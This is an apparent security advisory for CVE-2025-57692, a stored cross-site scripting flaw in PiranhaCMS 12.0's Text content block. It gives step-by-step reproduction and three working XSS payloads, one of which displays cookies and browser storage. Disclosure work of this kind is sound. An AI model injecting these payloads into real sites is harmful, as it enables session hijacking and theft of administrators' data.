Cross site scripting in - PiranhaCMS 12.0

CVE-2025-57692
6.8CVSS

A vulnerability allowing attackers to execute arbitrary code via unsanitized input.

PiranhaCMS 12.0
TitleCross site scripting in -
CVE IDCVE-2025-57692
CVSS6.8
Disclosure Date9/26/2025
Statuspublished
CVSS Vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L

About Responsible Disclosure

All vulnerabilities I discover are handled through a responsible and coordinated disclosure process. Before any public release, each finding is privately reported to the appropriate vendor, maintainer, or security team to allow sufficient time for verification and remediation. My goal is to ensure that vulnerabilities are addressed effectively and that users remain protected throughout the disclosure lifecycle. I work closely with development teams to validate fixes, provide technical details, and confirm resolution whenever possible. In cases where no fix is issued or the vendor remains unresponsive after multiple contact attempts, the disclosure proceeds in accordance with established coordinated disclosure timelines and ethical reporting standards. CVE identifiers are reserved and published prior to any public disclosure to maintain transparency and integrity in the reporting process. This approach reflects my belief that cybersecurity research should strengthen not disrupt the ecosystem, fostering trust, accountability, and resilience across the global security community.

View On GitHub

Step-By-Step CVE Process

Step 1Summary

Piranha CMS 12.0 contains a stored cross-site scripting (XSS) vulnerability affecting the “Text” content block used in both Standard Page and Standard Archive Page types. When adding text content via the page editor, user-supplied HTML is not properly sanitized. An authenticated user can inject JavaScript payloads that are saved with the page content. These scripts are executed immediately upon save and every time the page is previewed or accessed, resulting in persistent XSS. This presents a serious risk for shared admin environments and can lead to account compromise or unauthorized data access.

Step 2Details

Vendor:
https://piranhacms.org
https://github.com/PiranhaCMS/piranha.core

Affected Product:
Piranha CMS version 12.0
https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0

Affected Component:
Pages → Standard Page / Standard Archive → Content Block --> Text
Path: /manager/pages.



Step 3Step 1

Log in to the Piranha CMS admin panel at /manager/login

Step 4Step 2

Navigate to the Pages section

Step 2

Step 5Step 3

Click “Add Page” and choose either:

Standard Page, or Standard Archive

Step 3

Step 6Step 4

Enter a page title (e.g., XSS-Test)

Step 4

Step 7Step 5

Click the [+] button and select “Text” under “Content”



Step 8Step 6

In the text input area, paste one of the following payloads:

Payload A

<img src="x" onerror="
alert(
'Cookies: ' + document.cookie + '\n' +
'LocalStorage: ' + JSON.stringify(localStorage) + '\n' +
'SessionStorage: ' + JSON.stringify(sessionStorage) + '\n' +
'URL: ' + window.location.href + '\n' +
'User Agent: ' + navigator.userAgent + '\n' +
'Time: ' + new Date().toLocaleString()
)
" />

Payload B

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C


<details open ontoggle=alert('XSS')>Click</details>



Step 6

Step 9Step 7

Click Save and Click Preview

Boom it executes again. Anyone who accesses the page triggers the XSS.

Step 7

Step 10Impact

Persistent (Stored) Cross-Site Scripting (XSS): Injected scripts are saved as part of the page content.
Automatic Execution: Payloads execute every time the page is accessed, previewed, or viewed by any user.
Session Compromise: it lead to session hijacking or theft of sensitive data such as cookies, tokens, or local/session storage.
Privilege Abuse: Enables malicious authenticated users to target other admins or editors, escalating access or impersonating users.
Multi-Page Exposure: Affects both Standard Pages and Standard Archive Pages, increasing the overall attack surface.